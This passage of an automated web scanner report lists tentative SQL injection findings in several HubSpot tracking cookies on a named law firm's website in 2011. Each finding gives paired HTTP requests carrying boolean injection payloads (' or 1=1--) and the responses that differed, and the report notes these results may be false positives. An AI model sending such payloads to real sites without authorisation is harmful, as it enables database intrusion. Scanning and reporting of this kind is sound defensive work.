<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 13645990'%20or%201%3d1--%20 and 13645990'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:10:57 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74646296'%20or%201%3d1--%20 and 74646296'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:11:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 73864364'%20or%201%3d1--%20 and 73864364'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:11:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 16119179'%20or%201%3d1--%20 and 16119179'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:11:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15646355'%20or%201%3d1--%20 and 15646355'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:11:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
